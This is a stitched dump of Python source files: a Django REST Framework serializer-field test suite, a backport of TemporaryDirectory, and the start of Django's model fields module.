self.assertEqual(serializer.fields['added'].read_only, True)
def test_auto_pk_fields_read_only(self):
"""
AutoField fields should be read_only by default.
"""
serializer = TimestampedModelSerializer()
self.assertEqual(serializer.fields['id'].read_only, True)
def test_non_auto_pk_fields_not_read_only(self):
"""
PK fields other than AutoField fields should not be read_only by default.
"""
serializer = CharPrimaryKeyModelSerializer()
self.assertEqual(serializer.fields['id'].read_only, False)
def test_dict_field_ordering(self):
"""
Field should preserve dictionary ordering, if it exists.
See: https://github.com/tomchristie/django-rest-framework/issues/832
"""
ret = SortedDict()
ret['c'] = 1
ret['b'] = 1
ret['a'] = 1
ret['z'] = 1
field = serializers.Field()
keys = list(field.to_native(ret).keys())
self.assertEqual(keys, ['c', 'b', 'a', 'z'])
class DateFieldTest(TestCase):
"""
    Tests for the DateField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts default iso input formats.
"""
f = serializers.DateField()
result_1 = f.from_native('1984-07-31')
self.assertEqual(datetime.date(1984, 7, 31), result_1)
def test_from_native_datetime_date(self):
"""
Make sure from_native() accepts a datetime.date instance.
"""
f = serializers.DateField()
result_1 = f.from_native(datetime.date(1984, 7, 31))
self.assertEqual(result_1, datetime.date(1984, 7, 31))
def test_from_native_custom_format(self):
"""
Make sure from_native() accepts custom input formats.
"""
f = serializers.DateField(input_formats=['%Y -- %d'])
result = f.from_native('1984 -- 31')
self.assertEqual(datetime.date(1984, 1, 31), result)
def test_from_native_invalid_default_on_custom_format(self):
"""
        Make sure from_native() doesn't accept default formats if a custom format is set
"""
f = serializers.DateField(input_formats=['%Y -- %d'])
try:
f.from_native('1984-07-31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Date has wrong format. Use one of these formats instead: YYYY -- DD"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.DateField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DateField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_from_native_invalid_date(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid date.
"""
f = serializers.DateField()
try:
f.from_native('1984-13-31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]]"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_invalid_format(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid format.
"""
f = serializers.DateField()
try:
f.from_native('1984 -- 31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]]"])
else:
self.fail("ValidationError was not properly raised")
def test_to_native(self):
"""
        Make sure to_native() returns a date object by default.
"""
f = serializers.DateField()
result_1 = f.to_native(datetime.date(1984, 7, 31))
self.assertEqual(datetime.date(1984, 7, 31), result_1)
def test_to_native_iso(self):
"""
        Make sure to_native() with 'iso-8601' returns an iso formatted date.
"""
f = serializers.DateField(format='iso-8601')
result_1 = f.to_native(datetime.date(1984, 7, 31))
self.assertEqual('1984-07-31', result_1)
def test_to_native_custom_format(self):
"""
Make sure to_native() returns correct custom format.
"""
f = serializers.DateField(format="%Y - %m.%d")
result_1 = f.to_native(datetime.date(1984, 7, 31))
self.assertEqual('1984 - 07.31', result_1)
def test_to_native_none(self):
"""
        Make sure to_native() returns None on None param.
"""
f = serializers.DateField(required=False)
self.assertEqual(None, f.to_native(None))
class DateTimeFieldTest(TestCase):
"""
Tests for the DateTimeField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts default iso input formats.
"""
f = serializers.DateTimeField()
result_1 = f.from_native('1984-07-31 04:31')
result_2 = f.from_native('1984-07-31 04:31:59')
result_3 = f.from_native('1984-07-31 04:31:59.000200')
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31), result_1)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59), result_2)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59, 200), result_3)
def test_from_native_datetime_datetime(self):
"""
Make sure from_native() accepts a datetime.datetime instance.
"""
f = serializers.DateTimeField()
result_1 = f.from_native(datetime.datetime(1984, 7, 31, 4, 31))
result_2 = f.from_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_3 = f.from_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual(result_1, datetime.datetime(1984, 7, 31, 4, 31))
self.assertEqual(result_2, datetime.datetime(1984, 7, 31, 4, 31, 59))
self.assertEqual(result_3, datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
def test_from_native_custom_format(self):
"""
Make sure from_native() accepts custom input formats.
"""
f = serializers.DateTimeField(input_formats=['%Y -- %H:%M'])
result = f.from_native('1984 -- 04:59')
self.assertEqual(datetime.datetime(1984, 1, 1, 4, 59), result)
def test_from_native_invalid_default_on_custom_format(self):
"""
        Make sure from_native() doesn't accept default formats if a custom format is set
"""
f = serializers.DateTimeField(input_formats=['%Y -- %H:%M'])
try:
f.from_native('1984-07-31 04:31:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Datetime has wrong format. Use one of these formats instead: YYYY -- hh:mm"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.DateTimeField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DateTimeField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_from_native_invalid_datetime(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid datetime.
"""
f = serializers.DateTimeField()
try:
f.from_native('04:61:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Datetime has wrong format. Use one of these formats instead: "
"YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HHMM|-HHMM|Z]"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_invalid_format(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid format.
"""
f = serializers.DateTimeField()
try:
f.from_native('04 -- 31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Datetime has wrong format. Use one of these formats instead: "
"YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HHMM|-HHMM|Z]"])
else:
self.fail("ValidationError was not properly raised")
def test_to_native(self):
"""
        Make sure to_native() returns a datetime object by default.
"""
f = serializers.DateTimeField()
result_1 = f.to_native(datetime.datetime(1984, 7, 31))
result_2 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31))
result_3 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_4 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual(datetime.datetime(1984, 7, 31), result_1)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31), result_2)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59), result_3)
self.assertEqual(datetime.datetime(1984, 7, 31, 4, 31, 59, 200), result_4)
def test_to_native_iso(self):
"""
Make sure to_native() with format=iso-8601 returns iso formatted datetime.
"""
f = serializers.DateTimeField(format='iso-8601')
result_1 = f.to_native(datetime.datetime(1984, 7, 31))
result_2 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31))
result_3 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_4 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual('1984-07-31T00:00:00', result_1)
self.assertEqual('1984-07-31T04:31:00', result_2)
self.assertEqual('1984-07-31T04:31:59', result_3)
self.assertEqual('1984-07-31T04:31:59.000200', result_4)
def test_to_native_custom_format(self):
"""
Make sure to_native() returns correct custom format.
"""
f = serializers.DateTimeField(format="%Y - %H:%M")
result_1 = f.to_native(datetime.datetime(1984, 7, 31))
result_2 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31))
result_3 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59))
result_4 = f.to_native(datetime.datetime(1984, 7, 31, 4, 31, 59, 200))
self.assertEqual('1984 - 00:00', result_1)
self.assertEqual('1984 - 04:31', result_2)
self.assertEqual('1984 - 04:31', result_3)
self.assertEqual('1984 - 04:31', result_4)
def test_to_native_none(self):
"""
        Make sure to_native() returns None on None param.
"""
f = serializers.DateTimeField(required=False)
self.assertEqual(None, f.to_native(None))
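# Editor's note: an illustrative sketch, not part of the original test module.
# It shows how the format/input_formats options verified above are typically
# declared on a serializer; the class and field names are assumptions.
class _SketchTimestampSerializer(serializers.Serializer):
    created = serializers.DateTimeField(format='iso-8601',
                                        input_formats=['%Y-%m-%d %H:%M'])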
class TimeFieldTest(TestCase):
"""
Tests for the TimeField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts default iso input formats.
"""
f = serializers.TimeField()
result_1 = f.from_native('04:31')
result_2 = f.from_native('04:31:59')
result_3 = f.from_native('04:31:59.000200')
self.assertEqual(datetime.time(4, 31), result_1)
self.assertEqual(datetime.time(4, 31, 59), result_2)
self.assertEqual(datetime.time(4, 31, 59, 200), result_3)
def test_from_native_datetime_time(self):
"""
Make sure from_native() accepts a datetime.time instance.
"""
f = serializers.TimeField()
result_1 = f.from_native(datetime.time(4, 31))
result_2 = f.from_native(datetime.time(4, 31, 59))
result_3 = f.from_native(datetime.time(4, 31, 59, 200))
self.assertEqual(result_1, datetime.time(4, 31))
self.assertEqual(result_2, datetime.time(4, 31, 59))
self.assertEqual(result_3, datetime.time(4, 31, 59, 200))
def test_from_native_custom_format(self):
"""
Make sure from_native() accepts custom input formats.
"""
f = serializers.TimeField(input_formats=['%H -- %M'])
result = f.from_native('04 -- 31')
self.assertEqual(datetime.time(4, 31), result)
def test_from_native_invalid_default_on_custom_format(self):
"""
        Make sure from_native() doesn't accept default formats if a custom format is set
"""
f = serializers.TimeField(input_formats=['%H -- %M'])
try:
f.from_native('04:31:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Time has wrong format. Use one of these formats instead: hh -- mm"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.TimeField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.TimeField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_from_native_invalid_time(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid time.
"""
f = serializers.TimeField()
try:
f.from_native('04:61:59')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Time has wrong format. Use one of these formats instead: "
"hh:mm[:ss[.uuuuuu]]"])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_invalid_format(self):
"""
Make sure from_native() raises a ValidationError on passing an invalid format.
"""
f = serializers.TimeField()
try:
f.from_native('04 -- 31')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Time has wrong format. Use one of these formats instead: "
"hh:mm[:ss[.uuuuuu]]"])
else:
self.fail("ValidationError was not properly raised")
def test_to_native(self):
"""
Make sure to_native() returns time object as default.
"""
f = serializers.TimeField()
result_1 = f.to_native(datetime.time(4, 31))
result_2 = f.to_native(datetime.time(4, 31, 59))
result_3 = f.to_native(datetime.time(4, 31, 59, 200))
self.assertEqual(datetime.time(4, 31), result_1)
self.assertEqual(datetime.time(4, 31, 59), result_2)
self.assertEqual(datetime.time(4, 31, 59, 200), result_3)
def test_to_native_iso(self):
"""
Make sure to_native() with format='iso-8601' returns iso formatted time.
"""
f = serializers.TimeField(format='iso-8601')
result_1 = f.to_native(datetime.time(4, 31))
result_2 = f.to_native(datetime.time(4, 31, 59))
result_3 = f.to_native(datetime.time(4, 31, 59, 200))
self.assertEqual('04:31:00', result_1)
self.assertEqual('04:31:59', result_2)
self.assertEqual('04:31:59.000200', result_3)
def test_to_native_custom_format(self):
"""
Make sure to_native() returns correct custom format.
"""
f = serializers.TimeField(format="%H - %S [%f]")
result_1 = f.to_native(datetime.time(4, 31))
result_2 = f.to_native(datetime.time(4, 31, 59))
result_3 = f.to_native(datetime.time(4, 31, 59, 200))
self.assertEqual('04 - 00 [000000]', result_1)
self.assertEqual('04 - 59 [000000]', result_2)
self.assertEqual('04 - 59 [000200]', result_3)
class DecimalFieldTest(TestCase):
"""
Tests for the DecimalField from_native() and to_native() behavior
"""
def test_from_native_string(self):
"""
Make sure from_native() accepts string values
"""
f = serializers.DecimalField()
result_1 = f.from_native('9000')
result_2 = f.from_native('1.00000001')
self.assertEqual(Decimal('9000'), result_1)
self.assertEqual(Decimal('1.00000001'), result_2)
def test_from_native_invalid_string(self):
"""
Make sure from_native() raises ValidationError on passing invalid string
"""
f = serializers.DecimalField()
try:
f.from_native('123.45.6')
except validators.ValidationError as e:
self.assertEqual(e.messages, ["Enter a number."])
else:
self.fail("ValidationError was not properly raised")
def test_from_native_integer(self):
"""
Make sure from_native() accepts integer values
"""
f = serializers.DecimalField()
result = f.from_native(9000)
self.assertEqual(Decimal('9000'), result)
def test_from_native_float(self):
"""
Make sure from_native() accepts float values
"""
f = serializers.DecimalField()
result = f.from_native(1.00000001)
self.assertEqual(Decimal('1.00000001'), result)
def test_from_native_empty(self):
"""
Make sure from_native() returns None on empty param.
"""
f = serializers.DecimalField()
result = f.from_native('')
self.assertEqual(result, None)
def test_from_native_none(self):
"""
Make sure from_native() returns None on None param.
"""
f = serializers.DecimalField()
result = f.from_native(None)
self.assertEqual(result, None)
def test_to_native(self):
"""
        Make sure to_native() returns the Decimal value unchanged.
"""
f = serializers.DecimalField()
result_1 = f.to_native(Decimal('9000'))
result_2 = f.to_native(Decimal('1.00000001'))
self.assertEqual(Decimal('9000'), result_1)
self.assertEqual(Decimal('1.00000001'), result_2)
def test_to_native_none(self):
"""
        Make sure to_native() returns None on None param.
"""
f = serializers.DecimalField(required=False)
self.assertEqual(None, f.to_native(None))
def test_valid_serialization(self):
"""
Make sure the serializer works correctly
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_value=9010,
min_value=9000,
max_digits=6,
decimal_places=2)
self.assertTrue(DecimalSerializer(data={'decimal_field': '9001'}).is_valid())
self.assertTrue(DecimalSerializer(data={'decimal_field': '9001.2'}).is_valid())
self.assertTrue(DecimalSerializer(data={'decimal_field': '9001.23'}).is_valid())
self.assertFalse(DecimalSerializer(data={'decimal_field': '8000'}).is_valid())
self.assertFalse(DecimalSerializer(data={'decimal_field': '9900'}).is_valid())
self.assertFalse(DecimalSerializer(data={'decimal_field': '9001.234'}).is_valid())
def test_raise_max_value(self):
"""
        Make sure max_value violations raise a ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_value=100)
s = DecimalSerializer(data={'decimal_field': '123'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure this value is less than or equal to 100.']})
def test_raise_min_value(self):
"""
        Make sure min_value violations raise a ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(min_value=100)
s = DecimalSerializer(data={'decimal_field': '99'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure this value is greater than or equal to 100.']})
def test_raise_max_digits(self):
"""
        Make sure max_digits violations raise a ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_digits=5)
s = DecimalSerializer(data={'decimal_field': '123.456'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure that there are no more than 5 digits in total.']})
def test_raise_max_decimal_places(self):
"""
        Make sure max_decimal_places violations raise a ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(decimal_places=3)
s = DecimalSerializer(data={'decimal_field': '123.4567'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure that there are no more than 3 decimal places.']})
def test_raise_max_whole_digits(self):
"""
        Make sure max_whole_digits violations raise a ValidationError
"""
class DecimalSerializer(serializers.Serializer):
decimal_field = serializers.DecimalField(max_digits=4, decimal_places=3)
s = DecimalSerializer(data={'decimal_field': '12345.6'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'decimal_field': ['Ensure that there are no more than 4 digits in total.']})
class ChoiceFieldTests(TestCase):
"""
Tests for the ChoiceField options generator
"""
def test_choices_required(self):
"""
Make sure proper choices are rendered if field is required
"""
f = serializers.ChoiceField(required=True, choices=SAMPLE_CHOICES)
self.assertEqual(f.choices, SAMPLE_CHOICES)
def test_choices_not_required(self):
"""
Make sure proper choices (plus blank) are rendered if the field isn't required
"""
f = serializers.ChoiceField(required=False, choices=SAMPLE_CHOICES)
self.assertEqual(f.choices, models.fields.BLANK_CHOICE_DASH + SAMPLE_CHOICES)
def test_invalid_choice_model(self):
s = ChoiceFieldModelSerializer(data={'choice': 'wrong_value'})
self.assertFalse(s.is_valid())
self.assertEqual(s.errors, {'choice': ['Select a valid choice. wrong_value is not one of the available choices.']})
self.assertEqual(s.data['choice'], '')
def test_empty_choice_model(self):
"""
Test that the 'empty' value is correctly passed and used depending on
the 'null' property on the model field.
"""
s = ChoiceFieldModelSerializer(data={'choice': ''})
self.assertTrue(s.is_valid())
self.assertEqual(s.data['choice'], '')
s = ChoiceFieldModelWithNullSerializer(data={'choice': ''})
self.assertTrue(s.is_valid())
self.assertEqual(s.data['choice'], None)
def test_from_native_empty(self):
"""
Make sure from_native() returns an empty string on empty param by default.
"""
f = serializers.ChoiceField(choices=SAMPLE_CHOICES)
self.assertEqual(f.from_native(''), '')
self.assertEqual(f.from_native(None), '')
def test_from_native_empty_override(self):
"""
Make sure you can override from_native() behavior regarding empty values.
"""
f = serializers.ChoiceField(choices=SAMPLE_CHOICES, empty=None)
self.assertEqual(f.from_native(''), None)
self.assertEqual(f.from_native(None), None)
def test_metadata_choices(self):
"""
Make sure proper choices are included in the field's metadata.
"""
choices = [{'value': v, 'display_name': n} for v, n in SAMPLE_CHOICES]
f = serializers.ChoiceField(choices=SAMPLE_CHOICES)
self.assertEqual(f.metadata()['choices'], choices)
def test_metadata_choices_not_required(self):
"""
Make sure proper choices are included in the field's metadata.
"""
choices = [{'value': v, 'display_name': n}
for v, n in models.fields.BLANK_CHOICE_DASH + SAMPLE_CHOICES]
f = serializers.ChoiceField(required=False, choices=SAMPLE_CHOICES)
self.assertEqual(f.metadata()['choices'], choices)
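# Editor's note: an illustrative sketch, not part of the original test module.
# It shows the two ChoiceField configurations compared above: a required field
# keeps the choices as given, while an optional one gains the blank choice.
# The serializer and field names are assumptions for illustration.
class _SketchColorSerializer(serializers.Serializer):
    required_color = serializers.ChoiceField(choices=SAMPLE_CHOICES)
    optional_color = serializers.ChoiceField(choices=SAMPLE_CHOICES,
                                             required=False)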
class EmailFieldTests(TestCase):
"""
Tests for EmailField attribute values
"""
class EmailFieldModel(RESTFrameworkModel):
email_field = models.EmailField(blank=True)
class EmailFieldWithGivenMaxLengthModel(RESTFrameworkModel):
email_field = models.EmailField(max_length=150, blank=True)
def test_default_model_value(self):
class EmailFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.EmailFieldModel
serializer = EmailFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['email_field'], 'max_length'), 75)
def test_given_model_value(self):
class EmailFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.EmailFieldWithGivenMaxLengthModel
serializer = EmailFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['email_field'], 'max_length'), 150)
def test_given_serializer_value(self):
class EmailFieldSerializer(serializers.ModelSerializer):
email_field = serializers.EmailField(source='email_field', max_length=20, required=False)
class Meta:
model = self.EmailFieldModel
serializer = EmailFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['email_field'], 'max_length'), 20)
class SlugFieldTests(TestCase):
"""
Tests for SlugField attribute values
"""
class SlugFieldModel(RESTFrameworkModel):
slug_field = models.SlugField(blank=True)
class SlugFieldWithGivenMaxLengthModel(RESTFrameworkModel):
slug_field = models.SlugField(max_length=84, blank=True)
def test_default_model_value(self):
class SlugFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.SlugFieldModel
serializer = SlugFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['slug_field'], 'max_length'), 50)
def test_given_model_value(self):
class SlugFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.SlugFieldWithGivenMaxLengthModel
serializer = SlugFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['slug_field'], 'max_length'), 84)
def test_given_serializer_value(self):
class SlugFieldSerializer(serializers.ModelSerializer):
slug_field = serializers.SlugField(source='slug_field',
max_length=20, required=False)
class Meta:
model = self.SlugFieldModel
serializer = SlugFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['slug_field'],
'max_length'), 20)
def test_invalid_slug(self):
"""
Make sure an invalid slug raises ValidationError
"""
class SlugFieldSerializer(serializers.ModelSerializer):
slug_field = serializers.SlugField(source='slug_field', max_length=20, required=True)
class Meta:
model = self.SlugFieldModel
s = SlugFieldSerializer(data={'slug_field': 'a b'})
self.assertEqual(s.is_valid(), False)
self.assertEqual(s.errors, {'slug_field': ["Enter a valid 'slug' consisting of letters, numbers, underscores or hyphens."]})
class URLFieldTests(TestCase):
"""
Tests for URLField attribute values.
(Includes test for #1210, checking that validators can be overridden.)
"""
class URLFieldModel(RESTFrameworkModel):
url_field = models.URLField(blank=True)
class URLFieldWithGivenMaxLengthModel(RESTFrameworkModel):
url_field = models.URLField(max_length=128, blank=True)
def test_default_model_value(self):
class URLFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.URLFieldModel
serializer = URLFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['url_field'],
'max_length'), 200)
def test_given_model_value(self):
class URLFieldSerializer(serializers.ModelSerializer):
class Meta:
model = self.URLFieldWithGivenMaxLengthModel
serializer = URLFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['url_field'],
'max_length'), 128)
def test_given_serializer_value(self):
class URLFieldSerializer(serializers.ModelSerializer):
url_field = serializers.URLField(source='url_field',
max_length=20, required=False)
class Meta:
model = self.URLFieldWithGivenMaxLengthModel
serializer = URLFieldSerializer(data={})
self.assertEqual(serializer.is_valid(), True)
self.assertEqual(getattr(serializer.fields['url_field'],
'max_length'), 20)
def test_validators_can_be_overridden(self):
url_field = serializers.URLField(validators=[])
validators = url_field.validators
self.assertEqual([], validators, 'Passing `validators` kwarg should have overridden default validators')
class FieldMetadata(TestCase):
def setUp(self):
self.required_field = serializers.Field()
self.required_field.label = uuid4().hex
self.required_field.required = True
self.optional_field = serializers.Field()
self.optional_field.label = uuid4().hex
self.optional_field.required = False
def test_required(self):
self.assertEqual(self.required_field.metadata()['required'], True)
def test_optional(self):
self.assertEqual(self.optional_field.metadata()['required'], False)
def test_label(self):
for field in (self.required_field, self.optional_field):
self.assertEqual(field.metadata()['label'], field.label)
class FieldCallableDefault(TestCase):
def setUp(self):
self.simple_callable = lambda: 'foo bar'
def test_default_can_be_simple_callable(self):
"""
Ensure that the 'default' argument can also be a simple callable.
"""
field = serializers.WritableField(default=self.simple_callable)
into = {}
field.field_from_native({}, {}, 'field', into)
self.assertEqual(into, {'field': 'foo bar'})
class CustomIntegerField(TestCase):
"""
Test that custom fields apply min_value and max_value constraints
"""
def test_custom_fields_can_be_validated_for_value(self):
class MoneyField(models.PositiveIntegerField):
pass
class EntryModel(models.Model):
bank = MoneyField(validators=[validators.MaxValueValidator(100)])
class EntrySerializer(serializers.ModelSerializer):
class Meta:
model = EntryModel
entry = EntryModel(bank=1)
serializer = EntrySerializer(entry, data={"bank": 11})
self.assertTrue(serializer.is_valid())
serializer = EntrySerializer(entry, data={"bank": -1})
self.assertFalse(serializer.is_valid())
serializer = EntrySerializer(entry, data={"bank": 101})
self.assertFalse(serializer.is_valid())
class BooleanField(TestCase):
"""
Tests for BooleanField
"""
def test_boolean_required(self):
class BooleanRequiredSerializer(serializers.Serializer):
bool_field = serializers.BooleanField(required=True)
self.assertFalse(BooleanRequiredSerializer(data={}).is_valid())
| gpl-2.0 |
scitran/utilities | tempdir.py | 5 | 3074 | """This is a backport of TemporaryDirectory from Python 3.3."""
from __future__ import print_function
import warnings as _warnings
import sys as _sys
import os as _os
from tempfile import mkdtemp
template = "tmp"
# ResourceWarning does not exist on Python 2, where this backport is typically
# used; fall back to UserWarning so the implicit-cleanup warning issued from
# __del__ cannot itself raise a NameError.
try:
    ResourceWarning
except NameError:
    ResourceWarning = UserWarning
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix="", prefix=template, dir=None):
self._closed = False
self.name = None # Handle mkdtemp raising an exception
self.name = mkdtemp(suffix, prefix, dir)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def cleanup(self, _warn=False):
if self.name and not self._closed:
try:
self._rmtree(self.name)
except (TypeError, AttributeError) as ex:
# Issue #10188: Emit a warning on stderr
# if the directory could not be cleaned
# up due to missing globals
if "None" not in str(ex):
raise
print("ERROR: {!r} while cleaning up {!r}".format(ex, self,),
file=_sys.stderr)
return
self._closed = True
if _warn:
self._warn("Implicitly cleaning up {!r}".format(self),
ResourceWarning)
def __exit__(self, exc, value, tb):
self.cleanup()
def __del__(self):
# Issue a ResourceWarning if implicit cleanup needed
self.cleanup(_warn=True)
# XXX (ncoghlan): The following code attempts to make
# this class tolerant of the module nulling out process
# that happens during CPython interpreter shutdown
# Alas, it doesn't actually manage it. See issue #10188
_listdir = staticmethod(_os.listdir)
_path_join = staticmethod(_os.path.join)
_isdir = staticmethod(_os.path.isdir)
_islink = staticmethod(_os.path.islink)
_remove = staticmethod(_os.remove)
_rmdir = staticmethod(_os.rmdir)
_os_error = OSError
_warn = _warnings.warn
def _rmtree(self, path):
# Essentially a stripped down version of shutil.rmtree. We can't
# use globals because they may be None'ed out at shutdown.
for name in self._listdir(path):
fullname = self._path_join(path, name)
try:
isdir = self._isdir(fullname) and not self._islink(fullname)
except self._os_error:
isdir = False
if isdir:
self._rmtree(fullname)
else:
try:
self._remove(fullname)
except self._os_error:
pass
try:
self._rmdir(path)
except self._os_error:
pass
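# Illustrative usage of the class above (a sketch, not part of the original
# module): the temporary directory and everything in it are removed when the
# `with` block exits, even if an exception is raised inside it.
#
#     with TemporaryDirectory(prefix="scratch-") as tmpdir:
#         with open(_os.path.join(tmpdir, "data.txt"), "w") as f:
#             f.write("hello")
#     # tmpdir no longer exists here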
| mit |
ProfessionalIT/maxigenios-website | sdk/google_appengine/lib/django-1.4/django/db/models/fields/__init__.py | 12 | 47526 | import copy
import datetime
import decimal
import math
import warnings
from itertools import tee
from django.db import connection
from django.db.models.query_utils import QueryWrapper
from django.conf import settings
from django import forms
from django.core import exceptions, validators
from django.utils.datastructures import DictWrapper
from django.utils.dateparse import parse_date, parse_datetime, parse_time
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode, force_unicode, smart_str
from django.utils.ipv6 import clean_ipv6_address
class NOT_PROVIDED:
pass
# The values to use for "blank" in SelectFields. Will be appended to the start
# of most "choices" lists.
BLANK_CHOICE_DASH = [("", "---------")]
BLANK_CHOICE_NONE = [("", "None")]
class FieldDoesNotExist(Exception):
pass
# A guide to Field parameters:
#
# * name: The name of the field specified in the model.
# * attname: The attribute to use on the model object. This is the same as
# "name", except in the case of ForeignKeys, where "_id" is
# appended.
# * db_column: The db_column specified in the model (or None).
# * column: The database column for this field. This is the same as
# "attname", except if db_column is specified.
#
# Code that introspects values, or does other dynamic things, should use
# attname. For example, this gets the primary key value of object "obj":
#
# getattr(obj, opts.pk.attname)
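#
# As a hypothetical illustration (the names below are not from this module):
# for a model declaring `author = models.ForeignKey(Author)`, the field's name
# is "author", its attname is "author_id", and its column is "author_id"
# unless db_column overrides it, so:
#
#     entry.author      # the related Author instance
#     entry.author_id   # the raw value stored in the database column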
class Field(object):
"""Base class for all field types"""
# Designates whether empty strings fundamentally are allowed at the
# database level.
empty_strings_allowed = True
# These track each time a Field instance is created. Used to retain order.
# The auto_creation_counter is used for fields that Django implicitly
# creates, creation_counter is used for all user-specified fields.
creation_counter = 0
auto_creation_counter = -1
default_validators = [] # Default set of validators
default_error_messages = {
'invalid_choice': _(u'Value %r is not a valid choice.'),
'null': _(u'This field cannot be null.'),
'blank': _(u'This field cannot be blank.'),
'unique': _(u'%(model_name)s with this %(field_label)s '
u'already exists.'),
}
    # Generic field type description, usually overridden by subclasses
def _description(self):
return _(u'Field of type: %(field_type)s') % {
'field_type': self.__class__.__name__
}
description = property(_description)
def __init__(self, verbose_name=None, name=None, primary_key=False,
max_length=None, unique=False, blank=False, null=False,
db_index=False, rel=None, default=NOT_PROVIDED, editable=True,
serialize=True, unique_for_date=None, unique_for_month=None,
unique_for_year=None, choices=None, help_text='', db_column=None,
db_tablespace=None, auto_created=False, validators=[],
error_messages=None):
self.name = name
self.verbose_name = verbose_name
self.primary_key = primary_key
self.max_length, self._unique = max_length, unique
self.blank, self.null = blank, null
# Oracle treats the empty string ('') as null, so coerce the null
# option whenever '' is a possible value.
if (self.empty_strings_allowed and
connection.features.interprets_empty_strings_as_nulls):
